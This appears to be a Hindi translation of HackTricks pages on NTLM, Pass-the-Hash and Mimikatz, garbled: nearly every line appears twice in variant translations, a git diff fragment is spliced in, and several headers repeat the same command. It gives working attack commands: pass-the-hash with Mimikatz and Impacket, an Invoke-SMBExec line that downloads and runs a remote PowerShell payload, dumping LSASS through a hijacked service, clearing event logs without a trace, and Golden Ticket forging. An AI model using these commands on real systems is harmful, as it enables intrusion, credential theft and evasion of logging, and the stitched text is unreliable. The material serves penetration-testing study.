**चुनौती की लंबाई 8 बाइट है** और **2 प्रतिक्रियाएँ भेजी जाती हैं**: एक **24 बाइट** लंबी है और **दूसरी** की लंबाई **विविध** है।
**पहली प्रतिक्रिया** **HMAC\_MD5** का उपयोग करके **स्ट्रिंग** को एन्क्रिप्ट करके बनाई जाती है जो **क्लाइंट और डोमेन** द्वारा बनाई गई होती है और **की** के रूप में **NT हैश** का **MD4 हैश** उपयोग किया जाता है। फिर, **परिणाम** को **की** के रूप में उपयोग करके **HMAC\_MD5** का उपयोग करके **चैलेंज** को एन्क्रिप्ट किया जाएगा। इसमें, **8 बाइट्स का एक क्लाइंट चैलेंज जोड़ा जाएगा**। कुल: 24 B।
**पहली प्रतिक्रिया** को **HMAC\_MD5** का उपयोग करके बनाया जाता है, **client और domain** द्वारा गठित **स्ट्रिंग** को और **कुंजी** के रूप में **NT hash** के **हैश MD4** का उपयोग करके। फिर, **परिणाम** को **कुंजी** के रूप में उपयोग करके **HMAC\_MD5** का उपयोग करके **चुनौती** को गूंथने के लिए किया जाएगा। इसके लिए, **8 बाइट का एक client challenge जोड़ा जाएगा**। कुल: 24 B।
**दूसरी प्रतिक्रिया** **कई मानों** का उपयोग करके बनाई जाती है (एक नया क्लाइंट चैलेंज, एक **टाइमस्टैम्प** **रिप्ले अटैक्स** से बचने के लिए...)
**दूसरी प्रतिक्रिया** को उपयोग करके बनाया जाता है **कई मान** (एक नया client challenge, **replay attacks** से बचने के लिए एक **टाइमस्टैम्प**...)
यदि आपके पास एक **pcap है जिसमें सफल प्रमाणीकरण प्रक्रिया को कैप्चर किया गया है**, तो आप इस गाइड का पालन करके डोमेन, उपयोगकर्ता नाम, चैलेंज और प्रतिक्रिया प्राप्त कर सकते हैं और पासवर्ड को क्रैक करने की कोशिश कर सकते हैं: [https://research.801labs.org/cracking-an-ntlmv2-hash/](https://research.801labs.org/cracking-an-ntlmv2-hash/)
यदि आपके पास एक **pcap है जिसने एक सफल प्रमाणीकरण प्रक्रिया को कैप्चर किया है**, तो आप इस गाइड का पालन करके डोमेन, उपयोगकर्ता नाम, चुनौती और प्रतिक्रिया प्राप्त कर सकते हैं और पासवर्ड को तोड़ने का प्रयास कर सकते हैं: [https://research.801labs.org/cracking-an-ntlmv2-hash/](https://research.801labs.org/cracking-an-ntlmv2-hash/)
## Pass-the-Hash
**एक बार जब आपके पास पीड़ित का हैश हो**, तो आप इसका उपयोग उसकी नकल करने के लिए कर सकते हैं।\
आपको एक **टूल** का उपयोग करना होगा जो **NTLM प्रमाणीकरण को उस हैश का उपयोग करके प्रदर्शन करेगा**, **या** आप एक नया **sessionlogon** बना सकते हैं और उस **हैश** को **LSASS** के अंदर **इंजेक्ट** कर सकते हैं, ताकि जब भी कोई **NTLM प्रमाणीकरण किया जाता है**, वह **हैश उपयोग किया जाएगा।** आखिरी विकल्प वह है जो mimikatz करता है।
**जब आपके पास पीड़ित का हैश होता है**, तो आप इसका उपयोग **अनुकरण** करने के लिए कर सकते हैं।\
आपको एक **उपकरण** का उपयोग करना होगा जो **उस हैश का उपयोग करके NTLM प्रमाणीकरण करेगा**, **या** आप एक नया **सत्रलॉगऑन** बना सकते हैं और उस हैश को **LSASS** में इंजेक्ट कर सकते हैं, ताकि जब भी कोई **NTLM प्रमाणीकरण किया जाता है**, तो उस हैश का उपयोग किया जाएगा। आखिरी विकल्प है जिसे mimikatz करता है।
**कृपया, याद रखें कि आप Pass-the-Hash हमले कंप्यूटर खातों का उपयोग करके भी कर सकते हैं।**
**कृपया ध्यान दें कि आप कंप्यूटर खातों का उपयोग करके भी Pass-the-Hash हमले कर सकते हैं।**
### **Mimikatz**
**इसे एडमिनिस्ट्रेटर के रूप में चलाने की आवश्यकता है**
**व्यवस्थापक के रूप में चलाने की आवश्यकता है**
```bash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'
```
```markdown
यह एक प्रक्रिया शुरू करेगा जो उन उपयोगकर्ताओं के अंतर्गत आती है जिन्होंने mimikatz लॉन्च किया है, लेकिन LSASS में इंटरनली सहेजे गए क्रेडेंशियल्स वे होते हैं जो mimikatz पैरामीटर्स के अंदर होते हैं। फिर, आप नेटवर्क संसाधनों तक पहुँच सकते हैं जैसे कि आप वह उपयोगकर्ता हों (runas /netonly ट्रिक के समान लेकिन आपको प्लेन-टेक्स्ट पासवर्ड जानने की आवश्यकता नहीं है)।
यह एक प्रक्रिया को शुरू करेगा जो उन उपयोगकर्ताओं के नाम पर होगी जिन्होंने मिमीकैट्ज लॉन्च किया है, लेकिन LSASS में सहेजे गए क्रेडेंशियल्स मिमीकैट्ज पैरामीटर्स के अंदर होंगे। फिर, आप नेटवर्क संसाधनों तक पहुंच सकते हैं जैसे कि आप उस उपयोगकर्ता हो (जैसे `runas /netonly` ट्रिक लेकिन आपको plain-text पासवर्ड को जानने की आवश्यकता नहीं है)।
### लिनक्स से Pass-the-Hash
### लिनक्स से पास-द-हैश
आप लिनक्स से Pass-the-Hash का उपयोग करके Windows मशीनों में कोड निष्पादन प्राप्त कर सकते हैं।\
[**यहाँ जानें कि यह कैसे करें।**](../../windows/ntlm/broken-reference/)
आप लिनक्स से पास-द-हैश का उपयोग करके Windows मशीनों में कोड निष्पादन प्राप्त कर सकते हैं।\
[**यहाँ पहुंचें और इसे कैसे करें जानें।**](../../windows/ntlm/broken-reference/)
### Impacket Windows संकलित उपकरण
### Impacket Windows कंपाइल किए गए उपकरण
आप[ यहाँ से Windows के लिए impacket बाइनरीज़ डाउनलोड कर सकते हैं](https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries)।
आप यहाँ से [Windows के लिए Impacket बाइनरी डाउनलोड कर सकते हैं](https://github.com/ropnop/impacket\_static\_binaries/releases/tag/0.9.21-dev-binaries)।
* **psexec_windows.exe** `C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local`
* **psexec\_windows.exe** `C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local`
* **wmiexec.exe** `wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local`
* **atexec.exe** (इस मामले में आपको एक कमांड निर्दिष्ट करने की आवश्यकता है, cmd.exe और powershell.exe इंटरैक्टिव शेल प्राप्त करने के लिए मान्य नहीं हैं)`C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'`
* Impacket बाइनरीज़ के कई और भी हैं...
* **atexec.exe** (इस मामले में आपको एक कमांड निर्दिष्ट करने की आवश्यकता है, cmd.exe और powershell.exe एक इंटरैक्टिव शैली प्राप्त करने के लिए मान्य नहीं हैं) `C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'`
* और कई और Impacket बाइनरी हैं...
### Invoke-TheHash
आप यहाँ से powershell स्क्रिप्ट्स प्राप्त कर सकते हैं: [https://github.com/Kevin-Robertson/Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash)
आप यहाँ से पावरशेल स्क्रिप्ट प्राप्त कर सकते हैं: [https://github.com/Kevin-Robertson/Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash)
#### Invoke-SMBExec
```
Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
```
#### इन्वोक-डब्ल्यूएमआईइक्जेक्यूट
```
Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
```
#### Invoke-WMIExec
```
Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
```
#### Invoke-SMBClient
#### इनवोक-एसएमबीक्लाइंट
```
Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\dcorp-mgmt.my.domain.local\C$\ -verbose
```
#### Invoke-SMBEnum का प्रयोग
#### इनवोक-एसएमबीईनुम
```
Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 -Target dcorp-mgmt.dollarcorp.moneycorp.local -verbose
```
#### Invoke-TheHash
यह फ़ंक्शन **सभी अन्य का मिश्रण** है। आप **कई होस्ट्स** पास कर सकते हैं, कुछ को **बाहर कर सकते हैं** और जो **विकल्प** आप उपयोग करना चाहते हैं उसे **चुन सकते हैं** (_SMBExec, WMIExec, SMBClient, SMBEnum_)। यदि आप **SMBExec** और **WMIExec** में से **कोई भी** चुनते हैं लेकिन कोई _**Command**_ पैरामीटर नहीं देते हैं तो यह केवल **जांच** करेगा कि क्या आपके पास **पर्याप्त अनुमतिया** हैं।
यह फ़ंक्शन **सभी अन्य** का **मिश्रण** है। आप **कई होस्ट** पास कर सकते हैं, **किसी को छोड़ सकते** हैं और जिस **विकल्प** का उपयोग करना चाहते हैं उसे **चुन सकते** हैं (_SMBExec, WMIExec, SMBClient, SMBEnum_). अगर आप **SMBExec** और **WMIExec** में से **किसी भी** को चुनते हैं लेकिन आप **कोई** _**कमांड**_ पैरामीटर नहीं देते हैं तो यह **बस जांचेगा** कि क्या आपके पास **पर्याप्त अनुमतिया** हैं।
```
Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty h F6F38B793DB6A94BA04A52F1D3EE92F0
```
### [Evil-WinRM Pass the Hash](../../network-services-pentesting/5985-5986-pentesting-winrm.md#using-evil-winrm)
### [Evil-WinRM पास द हैश](../../network-services-pentesting/5985-5986-pentesting-winrm.md#using-evil-winrm)
### Windows Credentials Editor (WCE)
**इसे एडमिनिस्ट्रेटर के रूप में चलाने की आवश्यकता है**
**इसे व्यवस्थापक के रूप में चलाया जाना चाहिए**
यह टूल mimikatz के समान कार्य करेगा (LSASS मेमोरी में संशोधन करेगा)।
यह उपकरण mimikatz की तरही काम करेगा (LSASS मेमोरी को संशोधित करेगा)।
```
wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
```
### यूजरनेम और पासवर्ड के साथ मैनुअल विंडोज रिमोट एक्जीक्यूशन
### मैनुअल Windows रिमोट निष्पादन उपयोगकर्ता नाम और पासवर्ड के साथ
{% content-ref url="../lateral-movement/" %}
[lateral-movement](../lateral-movement/)
{% endcontent-ref %}
## विंडोज होस्ट से क्रेडेंशियल्स निकालना
## एक Windows होस्ट से क्रेडेंशियल्स निकालना
**विंडोज होस्ट से क्रेडेंशियल्स प्राप्त करने के बारे में अधिक जानकारी के लिए आपको इस पेज को पढ़ना चाहिए।**
**अधिक जानकारी के लिए** [**एक Windows होस्ट से क्रेडेंशियल्स प्राप्त करने के बारे में आपको इस पृष्ठ को पढ़ना चाहिए**](broken-reference)**.**
## NTLM रिले और रिस्पॉन्डर
**इन हमलों को कैसे करें, इस पर अधिक विस्तृत गाइड के लिए यहाँ पढ़ें:**
**इन हमलों को कैसे करने के बारे में अधिक विस्तृत गाइड के लिए यहाँ पढ़ें:**
{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %}
[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
{% endcontent-ref %}
## नेटवर्क कैप्चर से NTLM चैलेंजेस पार्स करना
## नेटवर्क कैप्चर से NTLM चैलेंज पार्स करें
**आप इसका उपयोग कर सकते हैं** [**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide)
**आप** [**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide) **का उपयोग कर सकते हैं**
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, hacktricks repo** और **hacktricks-cloud repo** में PRs सबमिट करके
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस** चाहिए? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को फॉलो** करें
</details>

View file

@ -4,48 +4,48 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें।**
* **अपने हैकिंग ट्रिक्स साझा करें और** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके** अपना योगदान दें
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** (https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
</details>
इस पृष्ठ की सामग्री [adsecurity.org](https://adsecurity.org/?page\_id=1821) से कॉपी की गई थी
इस पृष्ठ की सामग्री [adsecurity.org](https://adsecurity.org/?page\_id=1821) से कॉपी की गई थी
## LM और Clear-Text मेमोरी में
## LM और मेमोरी में साफ-टेक्स्ट
Windows 8.1 और Windows Server 2012 R2 के साथ शुरू होकर, LM हैश और "क्लियर-टेक्स्ट" पासवर्ड अब मेमोरी में नहीं होते हैं।
Windows 8.1 और Windows Server 2012 R2 के साथ, LM हैश और "साफ-टेक्स्ट" पासवर्ड अब मेमोरी में नहीं हैं।
"क्लियर-टेक्स्ट" पासवर्ड को LSASS में रखने से रोकने के लिए, निम्नलिखित रजिस्ट्री कुंजी को "0" पर सेट करना चाहिए (Digest Disabled):
"साफ-टेक्स्ट" पासवर्ड को LSASS में रखने से रोकने के लिए, निम्नलिखित रजिस्ट्री कुंजी को "0" पर सेट किया जाना चाहिए (डाइजेस्ट अक्षम):
_HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential" (DWORD)_
_HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)_
## **Mimikatz & LSA Protection:**
## **Mimikatz और LSA सुरक्षा:**
Windows Server 2012 R2 और Windows 8.1 में LSA Protection नामक एक नई सुविधा शामिल है जिसमें [LSASS को Windows Server 2012 R2 पर संरक्षित प्रक्रिया के रूप में सक्षम किया जाता है](https://technet.microsoft.com/en-us/library/dn408187.aspx) (Mimikatz एक ड्राइवर के साथ इसे बाइपास कर सकता है, लेकिन इससे इवेंट लॉग में कुछ शोर हो सकता है):
Windows Server 2012 R2 और Windows 8.1 में एक नई सुरक्षा विशेषता शामिल है जिसे LSA सुरक्षा कहा जाता है जिसमें [LSASS को Windows Server 2012 R2 पर संरक्षित प्रक्रिया के रूप में सक्षम किया गया है](https://technet.microsoft.com/en-us/library/dn408187.aspx) (Mimikatz एक ड्राइवर के साथ इसे छल सकता है, लेकिन इससे घटना लॉग में कुछ शोर करना चाहिए):
_एलएसए, जिसमें स्थानीय सुरक्षा प्राधिकरण सर्वर सेवा (LSASS) प्रक्रिया शामिल है, स्थानीय और दूरस्थ लॉगिन के लिए उपयोगकर्ताओं को मान्यता प्रदान करता है और स्थानीय सुरक्षा नीतियों को प्रवर्तित करता है। Windows 8.1 ऑपरेटिंग सिस्टम एलएसए के लिए अतिरिक्त सुरक्षा प्रदान करता है ताकि संरक्षित नहीं प्रक्रियाओं द्वारा मेमोरी और कोड इंजेक्शन पढ़ने और लिखने को रोका जा सके। इससे एलएसए द्वारा संग्रहित और प्रबंधित की जाने वाली प्रमाणिकाओं के लिए अतिरिक्त सुरक्षा प्रदान की जाती है।_
_LSA, जिसमें स्थानीय और दूरस्थ साइन-इन के लिए उपयोगकर्ताओं को मान्यता दी जाती है और स्थानीय सुरक्षा नीतियों को प्रवर्तित किया जाता है, विंडोज 8.1 ऑपरेटिंग सिस्टम एलएसए के लिए अतिरिक्त सुरक्षा प्रदान करता है ताकि गैर-संरक्षित प्रक्रियाओं द्वारा मेमोरी और कोड इंजेक्शन को पढ़ने और निषेधित करने से रोका जा सके। यह एलएसए द्वारा संभाले और प्रबंधित प्रमाणपत्रों के लिए अतिरिक्त सुरक्षा प्रदान करता है।_
LSA संरक्षण सक्षम करना:
LSA सुरक्षा सक्षम करना:
1. रजिस्ट्री संपादक (RegEdit.exe) खोलें और रजिस्ट्री कुंजी तक नेविगेट करें जो निम्नलिखित स्थित है: HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa और रजिस्ट्री कुंजी के मान को सेट करें: "RunAsPPL"=dword:00000001।
2. एक नया GPO बनाएं और कंप्यूटर कॉन्फ़िगरेशन, प्राथमिकताएँ, Windows सेटिंग्स पर ब्राउज़ करें। राइट-क्लिक करें रजिस्ट्री, नया के लिए प्वाइंट करें, और फिर रजिस्ट्री आइटम पर क्लिक करें। नई रजिस्ट्री संपत्ति डायलॉग बॉक्स दिखाई देती है। हाइव सूची में, HKEY\_LOCAL\_MACHINE पर क्लिक करें। कुंजी पथ सूची में, SYSTEM\CurrentControlSet\Control\Lsa तक ब्राउज़ करें। मान नाम बॉक्स में, RunAsPPL टाइप करें। मान प्रकार बॉक्स में, REG\_DWORD पर क्लिक करें। मान डेटा बॉक्स में, 00000001 टाइप करें। OK पर क्लिक करें।
1. रजिस्ट्री संपादक (RegEdit.exe) खोलें, और रजिस्ट्री कुंजी तक नेविगेट करें जो यहाँ स्थित है: HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa और रजिस्ट्री कुंजी का मान सेट करें: “RunAsPPL”=dword:00000001.
2. एक नया जीपीओ बनाएं और कंप्यूटर कॉन्फ़िगरेशन, प्राथमिकताएँ, विंडोज सेटिंग्स में ब्राउज़ करें। राइट-क्लिक करें रजिस्ट्री, इंटेंट करें न्यू, और फिर रजिस्ट्री आइटम पर क्लिक करें। न्यू रजिस्ट्री प्रॉपर्टीज़ डायलॉग बॉक्स दिखाई देगा। हाइव सूची में, HKEY\_LOCAL\_MACHINE पर क्लिक करें। कुंजी पथ सूची में, SYSTEM\CurrentControlSet\Control\Lsa तक ब्राउज़ करें। मान नाम बॉक्स में, RunAsPPL टाइप करें। मान प्रकार बॉक्स में, REG\_DWORD पर क्लिक करें। मान डेटा बॉक्स में, 00000001 टाइप करें। OK पर क्लिक करें।
LSA Protection गैर-संरक्षित प्रक्रियाओं को LSASS के साथ संवाद करने से रोकता है। Mimikatz अभी भी इसे एक ड्राइवर ("!+") के साथ बाइपास कर सकता है।
LSA सुरक्षा गैर-संरक्षित प्रक्रियाओं को LSASS के साथ बातचीत करने से रोकता है। Mimikatz एक ड्राइवर के साथ इसे अब भी छल सकता है ("!+").
[![Mimikatz-Driver-Remove-LSASS-Protection](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Driver-Remove-LSASS-Protection.jpg)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Driver-Remove-LSASS-Protection.jpg)
### Disabled SeDebugPrivilege को बाइपास करना
डिफ़ॉल्ट रूप से, SeDebugPrivilege को स्थानीय सुरक्षा नीति के माध्यम से व्यवस
### अक्षम SeDebugPrivilege को छलना
डिफ़ॉल्ट रूप से, SeDebugPrivilege को स्थानीय सुरक्षा नीति के माध्यम से व्यवस्थापक समूह को प्रदान किया जाता है। एक एक्टिव डायरेक्टरी वातावरण में, [इस विशेषाधिकार को हटाना संभव है](https://medium.com/blue-team/preventing-mimikatz-attacks-ed283e7ebdd5) कंप्यूटर कॉन्फ़िगरेशन --> नीत
```
sc config TrustedInstaller binPath= "C:\Users\Public\procdump64.exe -accepteula -ma lsass.exe C:\Users\Public\lsass.dmp"
sc start TrustedInstaller
```
[![TrustedInstaller-Dump-Lsass](https://1860093151-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M6yZUYP7DLMbZuztKpV%2Fuploads%2FJtprjloNPADNSpb6S0DS%2Fimage.png?alt=media&token=9b639459-bd4c-4897-90af-8990125fa058)
यह डंप फ़ाइल एक हमलावर्द नियंत्रित कंप्यूटर पर भेजी जा सकती है जहां से क्रेडेंशियल्स निकाले जा सकते हैं।
यह डंप फ़ाइल एक हमलावर नियंत्रित कंप्यूटर पर भेजी जा सकती है जहां से क्रेडेंशियल निकाले जा सकते हैं।
```
# privilege::debug
# sekurlsa::minidump lsass.dmp
@ -55,211 +55,147 @@ sc start TrustedInstaller
### **घटना**
**EVENT::Clear** - एक घटना लॉग को साफ करें\
**EVENT::Clear** एक घटना लॉग को साफ करें\
[\
![Mimikatz-Event-Clear](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Clear.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Clear.png)
**EVENT:::Drop** - (_**प्रायोगिक**_) नई घटनाओं से बचने के लिए इवेंट सेवा को पैच करें
**EVENT:::Drop** (_**प्रयोगात्मक**_) नई घटनाओं से बचने के लिए इवेंट सेवा को पैच करें
[![Mimikatz-Event-Drop](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Drop.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Drop.png)
नोट:\
privilege::debug चलाएं और फिर event::drop को चलाएं ताकि इवेंट लॉग को पैच किया जा सके। फिर Event::Clear चलाएं ताकि कोई भी लॉग साफ होने की घटना (1102) लॉग न हो
ध्यान दें:\
इवेंट लॉग को पैच करने के लिए privilege::debug चलाएं फिर event::drop को चलाएं। फिर Event::Clear को चलाएं ताकि कोई भी लॉग साफ हो बिना किसी लॉग साफ होने की घटना (1102) को लॉग न करें
### KERBEROS
### कर्बेरोस
#### गोल्डन टिकट
गोल्डन टिकट एक TGT है जिसमें KRBTGT NTLM पासवर्ड हैश का उपयोग करके एन्क्रिप्ट और साइन किया जाता है।
गोल्डन टिकट एक टीजीटी है जिसमें KRBTGT NTLM पासवर्ड हैश का उपयोग करके एन्क्रिप्ट और साइन किया जाता है।
गोल्डन टिकट (GT) का निर्माण किसी भी उपयोगकर्ता (वास्तविक या कल्पित) के रूप में किया जा सकता है और डोमेन में किसी भी समूह के सदस्य के रूप में किया जा सकता है (जो लगभग असीमित संख्या में अधिकार प्रदान करता है) और डोमेन में हर एवं हर संसाधन के लिए
गोल्डन टिकट (GT) क किसी भी उपयोगकर्ता (वास्तविक या कल्पित) का अनुकरण करने के लिए बनाया जा सकता है जो किसी भी समूह के सदस्य है डोमेन में (डोमेन में हर संसाधन के लिए एक असीमित मात्रा के अधिकार प्रदान करता है)।
**Mimikatz गोल्डन टिकट कमांड संदर्भ:**
**Mimikatz Golden Ticket Command Reference:**
गोल्डन टिकट बनाने के लिए Mimikatz कमांड है "kerberos::golden"
* /domain - पूर्ण नामवाला डोमेन। इस उदाहरण में: "lab.adsecurity.org"।
* /sid - डोमेन का SID। इस उदाहरण में: "S-1-5-21-1473643419-774954089-2222329127"।
* /sids - अधिक अधिकार वाले खातों / समूहों के लिए AD वन के अनुसार अतिरिक्त SID। सामान्यतः, इसमें रूट डोमेन के लिए Enterprise Admins समूह होगा "S-1-5-21-1473643419-774954089-5872329127-519"। [यह पैरामीटर प्रदान किए गए SID को SID History पैरामीटर में जोड़ता है।](https://adsecurity.org/?p=1640)
* /user - अनुकरण करने के लिए उपयोगकर्ता नाम
* /groups (वैकल्पिक) - उपयोगकर्ता के सदस्य होने वाले समूह RID (पहला मुख्य समूह है)।\
एक ही पहुंच प्राप्त करने के लिए उपयोगकर्ता या कंप्यूटर खाता RID जोड़ें।\
डिफ़ॉल्ट समूह: 513,512,520,518,519 विख्यात प्रशासक समूहों के लिए (नीचे सूचीबद्ध)
* /krbtgt - डोमेन KDC सेवा खाता (KRBTGT) के लिए NTLM पासवर्ड हैश। TGT को एन्क्रिप्ट और साइन करने के लिए उपयोग किया जाता है।
* /ticket (वैकल्पिक) - बाद में उपयोग के लिए गोल्डन टिकट फ़ाइल को सहेजने के लिए पथ और नाम प्रदान करें या /ptt का उपयोग करें ताकि तत्काल गोल्डन टिकट को मेमोरी में इंजेक्ट किया जा सके।
